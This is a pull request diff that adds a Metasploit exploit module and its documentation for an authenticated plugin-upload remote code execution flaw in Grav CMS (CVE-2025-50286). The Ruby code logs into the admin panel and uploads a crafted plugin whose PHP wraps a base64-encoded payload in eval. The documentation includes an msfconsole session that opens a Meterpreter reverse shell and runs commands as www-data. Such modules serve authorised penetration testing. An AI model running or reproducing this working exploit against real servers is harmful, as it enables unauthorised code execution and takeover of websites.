### PR TITLE
Adds exploit module for Grav CMS (CVE-2025-50286)

### DIFF
--- a/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
+++ b/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
@@ -24,7 +24,7 @@ making this functionality inherently dangerous when access control boundaries ar
 ## Affected Versions
 
 **Vulnerable:** Grav CMS `1.7.x` versions / Admin Plugin `v1.10.x `
-**Tested:** Grav CMS v1.7.48 / Admin Plugin v1.10.48
+**Tested:** Grav CMS v1.7.48, v1.7.49.5 / Admin Plugin v1.10.48, v1.10.49.3
 
 ### Installation
 
@@ -63,7 +63,7 @@ http://<target>/grav/admin
 
 ## Verification Steps
 
-1. Install Grav CMS 1.7.48 with Admin plugin enabled as mentioned above.
+1. Install Grav CMS with Admin plugin enabled as mentioned above.
 2. Create an administrative user.
 3. Start `msfconsole`.
 4. Do: `use exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286`
@@ -85,12 +85,12 @@ Valid administrative username. `Required.`
 Valid administrative password. `Required.`
 
 ## Scenarios
-### Version and OS Tested
+### Version Tested
 
-Grav CMS: 1.7.48
+Grav CMS: 1.7.48/1.7.49.5
+Admin Plugin: 1.10.48/1.10.49.3
 PHP: 8.1
 Web Server: Apache 2.4
-OS: Ubuntu 22.04
 
 ### Example: Exploiting Grav CMS v1.7.48 to get Meterpreter
 

--- a/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
+++ b/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
@@ -1,18 +1,25 @@
 ## Vulnerable Application
 
-Grav is a modern, open source flat-file content management system (CMS) built on PHP. It uses a file-based architecture instead of a traditional database, storing content and configuration directly on disk.
+Grav is a modern, open source flat-file content management system (CMS) built on PHP.
+It uses a file-based architecture instead of a traditional database, storing content and configuration directly on disk.
 
-This module exploits an authenticated Remote Code Execution vulnerability (`CVE-2025-50286`) in Grav CMS via the Admin panel’s **Direct Install** plugin functionality. The vulnerability exists because the Direct Install mechanism does not properly validate uploaded plugin archives before extraction and activation.
+This module exploits an authenticated Remote Code Execution vulnerability
+in Grav CMS via the Admin panel’s Direct Install plugin functionality,
+allowing arbitrary PHP execution.
 
-An authenticated administrative user can upload a crafted plugin ZIP archive containing arbitrary PHP code. Upon installation, the archive is extracted into the following directory:
+An authenticated administrative user can upload a crafted plugin ZIP archive containing arbitrary PHP code.
+Upon installation, the archive is extracted into the following directory:
 
 ```sh
 user/plugins/<plugin_name>/<plugin_name>.php
 ```
 
-Grav automatically loads plugin PHP files during initialization. As a result, the malicious PHP file is executed in the context of the web server user (typically `www-data`), leading to remote code execution.
+Grav automatically loads plugin PHP files during initialization.
+As a result, the malicious PHP file is executed in the context of the web server user
+(typically `www-data`), leading to remote code execution.
 
-No additional sandboxing or content validation is applied to plugin PHP files during the Direct Install workflow, making this functionality inherently dangerous when access control boundaries are crossed.
+No additional sandboxing or content validation is applied to plugin PHP files during the Direct Install workflow,
+making this functionality inherently dangerous when access control boundaries are crossed.
 
 ## Affected Versions
 
@@ -69,18 +76,6 @@ http://<target>/grav/admin
 
 ## Options
 
-### RHOSTS 
-
-Target address.
-
-### RPORT
-
-Target web server port. `Default: 80`
-
-### TARGETURI
-
-Base path to Grav installation. `Default: /`.
-
 ### USERNAME
 
 Valid administrative username. `Required.`
@@ -92,9 +87,9 @@ Valid administrative password. `Required.`
 ## Scenarios
 ### Version and OS Tested
 
-Grav CMS: 1.7.48  
-PHP: 8.1  
-Web Server: Apache 2.4 
+Grav CMS: 1.7.48
+PHP: 8.1
+Web Server: Apache 2.4
 OS: Ubuntu 22.04
 
 ### Example: Exploiting Grav CMS v1.7.48 to get Meterpreter
@@ -131,7 +126,9 @@ uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
 ## Cleanup
 
-This module does not guarantee automatic cleanup. Successful exploitation results in a plugin directory being written to and manual removal may be required from `TARGETURI` :
+This module does not guarantee automatic cleanup.
+Successful exploitation's plugin directory being written to
+and manual removal may be required from `TARGETURI` :
 
 ```sh
 rm -rf user/plugins/<random_name>plugin/
@@ -140,3 +137,4 @@ rm -rf user/plugins/<random_name>plugin/
 From there, further post-exploitation can be performed.
 
 ---
+

--- a/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
+++ b/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
@@ -11,7 +11,7 @@ An authenticated administrative user can upload a crafted plugin ZIP archive con
 Upon installation, the archive is extracted into the following directory:
 
 ```sh
-user/plugins/<plugin_name>/<plugin_name>.php
+user/plugins/<plugin_name>plugin/<plugin_name>plugin.php
 ```
 
 Grav automatically loads plugin PHP files during initialization.
@@ -23,7 +23,7 @@ making this functionality inherently dangerous when access control boundaries ar
 
 ## Affected Versions
 
-**Vulnerable:** Grav CMS `1.7.x` versions / Admin Plugin `v1.10.x `
+**Vulnerable:** Grav CMS `1.1.x` -> `1.7.x` versions / Admin Plugin `v1.2.x` -> `v1.10.x`
 **Tested:** Grav CMS v1.7.48, v1.7.49.5 / Admin Plugin v1.10.48, v1.10.49.3
 
 ### Installation

--- a/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
+++ b/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
@@ -104,20 +104,20 @@ msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set user
 username => x1o3
 msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set password Real_Pass123
 password => Real_Pass123
-msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set lhost 172.18.0.1
-lhost => 172.18.0.1
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set lhost 172.17.0.1
+lhost => 172.17.0.1
 msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > run
-[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Started reverse TCP handler on 172.17.0.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Grav CMS 1.7.48 is vulnerable
+[+] The target appears to be vulnerable. Grav CMS 1.7.49.5 is vulnerable
 [*] Authenticating to Grav admin...
 [*] Authenticating...
 [+] Already authenticated
 [*] Uploading plugin via Direct Install...
 [*] Sending stage (40004 bytes) to 172.18.0.2
-[*] Cleaning up plugin directory: user/plugins/quvyaqqy2btjuhtcadplugin
+[*] Cleaning up plugin directory: user/plugins/p7rysz0zphllq5hbhuplugin
 [+] Plugin directory removed
-[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:55638) at 2026-02-28 22:51:22 +0530
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.18.0.2:60566) at 2026-03-11 12:45:58 +0530[*] Started reverse TCP handler on 172.18.0.1:4444
 
 meterpreter > shell
 Process 25 created.

--- a/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
+++ b/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
@@ -109,15 +109,17 @@ lhost => 172.17.0.1
 msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > run
 [*] Started reverse TCP handler on 172.17.0.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Grav CMS 1.7.49.5 is vulnerable
+[+] The target appears to be vulnerable.
+    - Grav CMS 1.7.49.5 is vulnerable
+    - Admin Plugin v1.10.49.3 is vulnerable
 [*] Authenticating to Grav admin...
 [*] Authenticating...
 [+] Already authenticated
 [*] Uploading plugin via Direct Install...
 [*] Sending stage (40004 bytes) to 172.18.0.2
-[*] Cleaning up plugin directory: user/plugins/p7rysz0zphllq5hbhuplugin
+[*] Cleaning up plugin directory: user/plugins/g02omdfkh89ki8zruwplugin
 [+] Plugin directory removed
-[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.18.0.2:60566) at 2026-03-11 12:45:58 +0530[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.18.0.2:52520) at 2026-03-27 11:42:25 +0530
 
 meterpreter > shell
 Process 25 created.

--- a/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
+++ b/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
@@ -115,26 +115,16 @@ msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > run
 [+] Already authenticated
 [*] Uploading plugin via Direct Install...
 [*] Sending stage (40004 bytes) to 172.18.0.2
-[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:42662) at 2026-02-28 20:46:20 +0530
+[*] Cleaning up plugin directory: user/plugins/quvyaqqy2btjuhtcadplugin
+[+] Plugin directory removed
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:55638) at 2026-02-28 22:51:22 +0530
 
 meterpreter > shell
-Process 62 created.
+Process 25 created.
 Channel 0 created.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 ```
-
-## Cleanup
-
-This module does not guarantee automatic cleanup.
-Successful exploitation's plugin directory being written to
-and manual removal may be required from `TARGETURI` :
-
-```sh
-rm -rf user/plugins/<random_name>plugin/
-```
-
-From there, further post-exploitation can be performed.
 
 ---
 

--- a/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
+++ b/documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md
@@ -1,0 +1,142 @@
+## Vulnerable Application
+
+Grav is a modern, open source flat-file content management system (CMS) built on PHP. It uses a file-based architecture instead of a traditional database, storing content and configuration directly on disk.
+
+This module exploits an authenticated Remote Code Execution vulnerability (`CVE-2025-50286`) in Grav CMS via the Admin panel’s **Direct Install** plugin functionality. The vulnerability exists because the Direct Install mechanism does not properly validate uploaded plugin archives before extraction and activation.
+
+An authenticated administrative user can upload a crafted plugin ZIP archive containing arbitrary PHP code. Upon installation, the archive is extracted into the following directory:
+
+```sh
+user/plugins/<plugin_name>/<plugin_name>.php
+```
+
+Grav automatically loads plugin PHP files during initialization. As a result, the malicious PHP file is executed in the context of the web server user (typically `www-data`), leading to remote code execution.
+
+No additional sandboxing or content validation is applied to plugin PHP files during the Direct Install workflow, making this functionality inherently dangerous when access control boundaries are crossed.
+
+## Affected Versions
+
+**Vulnerable:** Grav CMS `1.7.x` versions / Admin Plugin `v1.10.x `
+**Tested:** Grav CMS v1.7.48 / Admin Plugin v1.10.48
+
+### Installation
+
+Official website:
+https://getgrav.org/
+
+Direct download archive (example version tested):
+https://github.com/getgrav/grav/releases/tag/1.7.48
+
+1. Install dependencies:
+
+```sh
+sudo apt update
+sudo apt install apache2 php php-cli php-zip php-curl unzip -y
+```
+
+2. Download Grav:
+
+``` sh
+wget https://github.com/getgrav/grav/releases/download/1.7.48/grav-admin-v1.7.48.zip
+unzip grav-admin-v1.7.48.zip
+sudo mv grav-admin /var/www/html/grav
+sudo chown -R www-data:www-data /var/www/html/grav
+```
+
+3. Visit the below and create an administrative user during setup.
+
+```sh
+http://<target>/grav/admin
+```
+
+4. Ensure:
+
+- Admin plugin is enabled
+- Direct Install functionality is available
+
+## Verification Steps
+
+1. Install Grav CMS 1.7.48 with Admin plugin enabled as mentioned above.
+2. Create an administrative user.
+3. Start `msfconsole`.
+4. Do: `use exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286`
+5. Do: `set RHOSTS [target]`
+6. Do: `set RPORT [Port]`
+7. Do: `set USERNAME [username]`
+8. Do: `set PASSWORD [password]`
+9. Do: `check`
+10. You should see the target is vulnerable
+
+## Options
+
+### RHOSTS 
+
+Target address.
+
+### RPORT
+
+Target web server port. `Default: 80`
+
+### TARGETURI
+
+Base path to Grav installation. `Default: /`.
+
+### USERNAME
+
+Valid administrative username. `Required.`
+
+### PASSWORD
+
+Valid administrative password. `Required.`
+
+## Scenarios
+### Version and OS Tested
+
+Grav CMS: 1.7.48  
+PHP: 8.1  
+Web Server: Apache 2.4 
+OS: Ubuntu 22.04
+
+### Example: Exploiting Grav CMS v1.7.48 to get Meterpreter
+
+```msf6
+msf6 > use exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set rhosts 192.168.1.12
+rhosts => 192.168.1.12
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set username x1o3
+username => x1o3
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set password Real_Pass123
+password => Real_Pass123
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set lhost 172.18.0.1
+lhost => 172.18.0.1
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > run
+[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Grav CMS 1.7.48 is vulnerable
+[*] Authenticating to Grav admin...
+[*] Authenticating...
+[+] Already authenticated
+[*] Uploading plugin via Direct Install...
+[*] Sending stage (40004 bytes) to 172.18.0.2
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:42662) at 2026-02-28 20:46:20 +0530
+
+meterpreter > shell
+Process 62 created.
+Channel 0 created.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+## Cleanup
+
+This module does not guarantee automatic cleanup. Successful exploitation results in a plugin directory being written to and manual removal may be required from `TARGETURI` :
+
+```sh
+rm -rf user/plugins/<random_name>plugin/
+```
+
+From there, further post-exploitation can be performed.
+
+---

--- a/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
+++ b/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Grav CMS Admin Direct Install Authenticated Plugin Upload RCE',
         'Description' => %q{
-          Grav CMS version 1.7.48 with Admin Plugin version 1.10.48 is
+          Grav CMS version <=1.7.49.5 with Admin Plugin version <=1.10.49.3 is
           vulnerable to authenticated remote code execution via the
           "Direct Install" feature in the administrative interface.
 
@@ -88,15 +88,9 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Detected('Grav CMS detected but version could not be determined')
     end
 
-    Rex::Version.new(version_str.gsub('-', '.'))
-
-    if Rex::Version.new('1.7.48')
+    if version_str <= Rex::Version.new('1.7.49.5')
       return CheckCode::Appears("Grav CMS #{version_str} is vulnerable")
     end
-  rescue ArgumentError
-    CheckCode::Detected("Grav CMS detected, version parsing failed: #{version_str}")
-  rescue ::Rex::ConnectionError
-    CheckCode::Unknown('Connection failed')
   end
 
   def exploit
@@ -109,8 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Uploading plugin via Direct Install...')
     upload_plugin(zip_data, plugin_name)
-
-    handler
   end
 
   def grav_installation?(html)
@@ -177,6 +169,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'login-nonce' => nonce.text
       }
     )
+
+    return :connection_failed unless res
+
     if [302, 303].include?(res.code)
       res = send_request_cgi(
         'method' => 'GET',
@@ -247,23 +242,17 @@ class MetasploitModule < Msf::Exploit::Remote
     PHP
   end
 
-  def build_multipart_body(boundary, nonce, zip_data, plugin_name)
-    parts = []
-
-    parts << "--#{boundary}\r\n" \
-             "Content-Disposition: form-data; name=\"task\"\r\n\r\n" \
-             "directInstall\r\n"
-
-    parts << "--#{boundary}\r\n" \
-             "Content-Disposition: form-data; name=\"admin-nonce\"\r\n\r\n" \
-             "#{nonce}\r\n"
-
-    parts << "--#{boundary}\r\n" \
-             "Content-Disposition: form-data; name=\"uploaded_file\"; filename=\"#{plugin_name}.zip\"\r\n" \
-             "Content-Type: application/zip\r\n\r\n" \
-             "#{zip_data}\r\n"
-
-    parts.join + "--#{boundary}--\r\n"
+  def build_multipart_body(nonce, zip_data, plugin_name)
+    mime = Rex::MIME::Message.new
+    mime.add_part('directInstall', nil, nil, 'form-data; name="task"')
+    mime.add_part(nonce, nil, nil, 'form-data; name="admin-nonce"')
+    mime.add_part(
+      zip_data,
+      'application/zip',
+      'binary',
+      "form-data; name=\"uploaded_file\"; filename=\"#{plugin_name}.zip\""
+    )
+    mime
   end
 
   def upload_plugin(zip_data, plugin_name)
@@ -275,15 +264,14 @@ class MetasploitModule < Msf::Exploit::Remote
     nonce = res.body.match(/name="admin-nonce"\s+value="([^"]+)"/)&.captures&.first
     fail_with(Failure::UnexpectedReply, 'Could not extract admin nonce') unless nonce
 
-    boundary = "----RubyFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"
-    post_body = build_multipart_body(boundary, nonce, zip_data, plugin_name)
+    mime = build_multipart_body(nonce, zip_data, plugin_name)
 
     res2 = send_request_cgi(
       'method' => 'POST',
       'uri' => install_uri,
       'keep_cookies' => true,
-      'ctype' => "multipart/form-data; boundary=#{boundary}",
-      'data' => post_body
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
     )
     fail_with(Failure::Unreachable, 'No response during plugin upload') unless res2
 

--- a/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
+++ b/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
-  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -36,6 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2025-50286'],
+          ['EDB', '52402'],
           ['URL', 'https://github.com/getgrav/grav'],
         ],
         'DisclosureDate' => '2025-08-07',
@@ -81,7 +81,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('Could not parse HTML') unless html
 
     return CheckCode::Safe('Target does not appear to be a Grav installation') unless grav_installation?(html)
-
     return CheckCode::Detected('Grav detected but login form not accessible') unless login_form_present?(html)
 
     version_str = get_version_after_login
@@ -89,13 +88,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Detected('Grav CMS detected but version could not be determined')
     end
 
-    version = Rex::Version.new(version_str.gsub('-', '.'))
+    Rex::Version.new(version_str.gsub('-', '.'))
 
-    if version < Rex::Version.new('1.8.0.beta.27')
+    if Rex::Version.new('1.7.48')
       return CheckCode::Appears("Grav CMS #{version_str} is vulnerable")
     end
-
-    CheckCode::Safe("Grav CMS #{version_str} is patched")
   rescue ArgumentError
     CheckCode::Detected("Grav CMS detected, version parsing failed: #{version_str}")
   rescue ::Rex::ConnectionError
@@ -106,7 +103,8 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Authenticating to Grav admin...')
     login
 
-    plugin_name = Rex::Text.rand_text_alphanumeric(12).downcase
+    plugin_name = Rex::Text.rand_text_alphanumeric(18).downcase
+    @name = plugin_name
     zip_data = build_plugin_zip(plugin_name)
 
     print_status('Uploading plugin via Direct Install...')
@@ -154,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def authenticate
-    res = send_request_cgi!(
+    res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'admin'),
       'keep_cookies' => true
@@ -224,13 +222,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_php_plugin(plugin_name)
-    encoded_payload = payload.encoded
+    b64_payload = Rex::Text.encode_base64(payload.encoded)
+    class_name = "#{plugin_name.capitalize}pluginPlugin"
+
     <<~PHP
       <?php
       namespace Grav\\Plugin;
       use Grav\\Common\\Plugin;
 
-      class #{plugin_name.capitalize}pluginPlugin extends Plugin
+      class #{class_name} extends Plugin
       {
           public static function getSubscribedEvents()
           {
@@ -238,9 +238,10 @@ class MetasploitModule < Msf::Exploit::Remote
                   'onPagesInitialized' => ['onPagesInitialized', 0]
               ];
           }
+
           public function onPagesInitialized()
           {
-              #{encoded_payload}
+              eval(base64_decode('#{b64_payload}'));
           }
       }
     PHP
@@ -292,5 +293,13 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     res2
+  end
+
+  def on_new_session(session)
+    super
+    plugin_dir = "user/plugins/#{@name}plugin"
+    print_status("Cleaning up plugin directory: #{plugin_dir}")
+    session.sys.process.execute("rm -rf #{plugin_dir}")
+    print_good('Plugin directory removed')
   end
 end

--- a/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
+++ b/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
@@ -113,8 +113,6 @@ class MetasploitModule < Msf::Exploit::Remote
     upload_plugin(zip_data, plugin_name)
 
     handler
-    register_files_for_cleanup("user/plugins/#{plugin_name}plugin/#{plugin_name}plugin.php")
-    register_dir_for_cleanup("user/plugins/#{plugin_name}plugin")
   end
 
   def grav_installation?(html)
@@ -242,7 +240,6 @@ class MetasploitModule < Msf::Exploit::Remote
           }
           public function onPagesInitialized()
           {
-              chmod(__DIR__, 0777);
               #{encoded_payload}
           }
       }

--- a/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
+++ b/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
@@ -62,6 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        OptString.new('TARGETURI', [true, 'Base Path', '/']),
         OptString.new('USERNAME', [true, 'Admin username']),
         OptString.new('PASSWORD', [true, 'Admin password']),
       ]
@@ -75,6 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     )
     return CheckCode::Unknown('Connection failed') unless res
+    return CheckCode::Unknown("Unexpected response code: #{res.code}") unless res.code == 200
 
     html = res.get_html_document
     return CheckCode::Unknown('Could not parse HTML') unless html
@@ -82,22 +84,32 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Safe('Target does not appear to be a Grav installation') unless grav_installation?(html)
     return CheckCode::Detected('Grav detected but login form not accessible') unless login_form_present?(html)
 
-    version = get_version_after_login
-    return CheckCode::Detected('Grav CMS detected but version could not be determined') unless version
+    cms_version, admin_version = get_version_after_login
+    return CheckCode::Detected('Grav CMS detected but version could not be determined') unless cms_version
+    return CheckCode::Detected('Admin Plugin version detected but could not be determined') unless admin_version
 
-    version = Rex::Version.new(version)
-    if version <= Rex::Version.new('1.7.49.5')
-      return CheckCode::Appears("Grav CMS #{version} is vulnerable")
+    version = Rex::Version.new(cms_version)
+    if version <= Rex::Version.new('1.7.49.5') && version >= Rex::Version.new('1.1.0')
+      vuln = true
     end
 
-    CheckCode::Safe("Grav CMS #{version} is not vulnerable")
+    if admin_version
+      plugin_version = Rex::Version.new(admin_version)
+      if plugin_version <= Rex::Version.new('1.10.49.3') && plugin_version >= Rex::Version.new('1.1.0') && vuln
+        return CheckCode::Appears("\n    - Grav CMS #{version} is vulnerable\n    - Admin Plugin v#{plugin_version} is vulnerable")
+      end
+    end
+
+    return CheckCode::Safe("Grav CMS #{cms_version} is not vulnerable") unless vuln
+
+    CheckCode::Safe("Admin Plugin v#{plugin_version} is not vulnerable")
   end
 
   def exploit
     print_status('Authenticating to Grav admin...')
     login
 
-    plugin_name = Rex::Text.rand_text_alphanumeric(18).downcase
+    plugin_name = (Rex::Text.rand_text_alpha(1) + Rex::Text.rand_text_alphanumeric(17)).downcase
     @name = plugin_name
     zip_data = build_plugin_zip(plugin_name)
 
@@ -137,10 +149,13 @@ class MetasploitModule < Msf::Exploit::Remote
     html = res.get_html_document
     return nil unless html
 
-    version_elem = html.at('span.grav-version')
-    return nil unless version_elem
+    cms_elem = html.at('span.grav-version')
+    cms_version = cms_elem.text.strip
+    parent_text = cms_elem.parent.text.gsub(/\s+/, ' ')
+    admin_version = parent_text[/Admin v([\d.]+)/, 1]
+    return nil unless cms_version
 
-    version_elem.text.strip
+    [cms_version, admin_version]
   end
 
   def authenticate
@@ -219,7 +234,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_php_plugin(plugin_name)
     b64_payload = Rex::Text.encode_base64(payload.encoded)
     class_name = "#{plugin_name.capitalize}pluginPlugin"
-    var_name = Rex::Text.rand_text_alpha(8)
+    Rex::Text.rand_text_alpha(8)
 
     <<~PHP
       <?php
@@ -238,9 +253,6 @@ class MetasploitModule < Msf::Exploit::Remote
           public function onPagesInitialized()
           {
               @eval(base64_decode('#{b64_payload}'));
-              $#{var_name} = __DIR__;
-              array_map('unlink', glob("$#{var_name}/*"));
-              @rmdir($#{var_name});#{'              '}
           }
       }
     PHP
@@ -264,6 +276,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi('method' => 'GET', 'uri' => install_uri, 'keep_cookies' => true)
     fail_with(Failure::Unreachable, 'No response fetching install page') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200
 
     nonce = res.body.match(/name="admin-nonce"\s+value="([^"]+)"/)&.captures&.first
     fail_with(Failure::UnexpectedReply, 'Could not extract admin nonce') unless nonce
@@ -283,11 +296,11 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_status("Upload redirected (#{res2.code}), following...")
       send_request_cgi('method' => 'GET', 'uri' => install_uri, 'keep_cookies' => true)
     end
-
-    res2
   end
 
   def on_new_session(session)
+    return unless session.type == 'meterpreter'
+
     super
     plugin_dir = "user/plugins/#{@name}plugin"
     print_status("Cleaning up plugin directory: #{plugin_dir}")

--- a/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
+++ b/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
@@ -89,6 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if version <= Rex::Version.new('1.7.49.5')
       return CheckCode::Appears("Grav CMS #{version} is vulnerable")
     end
+
     CheckCode::Safe("Grav CMS #{version} is not vulnerable")
   end
 
@@ -239,7 +240,7 @@ class MetasploitModule < Msf::Exploit::Remote
               @eval(base64_decode('#{b64_payload}'));
               $#{var_name} = __DIR__;
               array_map('unlink', glob("$#{var_name}/*"));
-              @rmdir($#{var_name});              
+              @rmdir($#{var_name});#{'              '}
           }
       }
     PHP

--- a/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
+++ b/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
@@ -62,7 +62,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Base path', '/']),
         OptString.new('USERNAME', [true, 'Admin username']),
         OptString.new('PASSWORD', [true, 'Admin password']),
       ]
@@ -83,14 +82,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Safe('Target does not appear to be a Grav installation') unless grav_installation?(html)
     return CheckCode::Detected('Grav detected but login form not accessible') unless login_form_present?(html)
 
-    version_str = get_version_after_login
-    unless version_str
-      return CheckCode::Detected('Grav CMS detected but version could not be determined')
-    end
+    version = get_version_after_login
+    return CheckCode::Detected('Grav CMS detected but version could not be determined') unless version
 
-    if version_str <= Rex::Version.new('1.7.49.5')
-      return CheckCode::Appears("Grav CMS #{version_str} is vulnerable")
+    version = Rex::Version.new(version)
+    if version <= Rex::Version.new('1.7.49.5')
+      return CheckCode::Appears("Grav CMS #{version} is vulnerable")
     end
+    CheckCode::Safe("Grav CMS #{version} is not vulnerable")
   end
 
   def exploit
@@ -219,6 +218,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_php_plugin(plugin_name)
     b64_payload = Rex::Text.encode_base64(payload.encoded)
     class_name = "#{plugin_name.capitalize}pluginPlugin"
+    var_name = Rex::Text.rand_text_alpha(8)
 
     <<~PHP
       <?php
@@ -236,7 +236,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
           public function onPagesInitialized()
           {
-              eval(base64_decode('#{b64_payload}'));
+              @eval(base64_decode('#{b64_payload}'));
+              $#{var_name} = __DIR__;
+              array_map('unlink', glob("$#{var_name}/*"));
+              @rmdir($#{var_name});              
           }
       }
     PHP

--- a/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
+++ b/modules/exploits/multi/http/grav_admin_direct_install_rce_cve_2025_50286.rb
@@ -1,0 +1,299 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Grav CMS Admin Direct Install Authenticated Plugin Upload RCE',
+        'Description' => %q{
+          Grav CMS version 1.7.48 with Admin Plugin version 1.10.48 is
+          vulnerable to authenticated remote code execution via the
+          "Direct Install" feature in the administrative interface.
+
+          An authenticated administrator can upload a crafted plugin
+          archive containing arbitrary PHP code. The uploaded plugin
+          is written to disk and executed by the application, allowing
+          command execution in the context of the web server user.
+
+          This module authenticates to the admin panel, uploads a
+          malicious plugin via /admin/tools/direct-install, and
+          triggers execution of the embedded payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'binneko',      # Original PoC / EDB
+          'x1o3'          # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2025-50286'],
+          ['URL', 'https://github.com/getgrav/grav'],
+        ],
+        'DisclosureDate' => '2025-08-07',
+        'Privileged' => false,
+        'Platform' => ['php'],
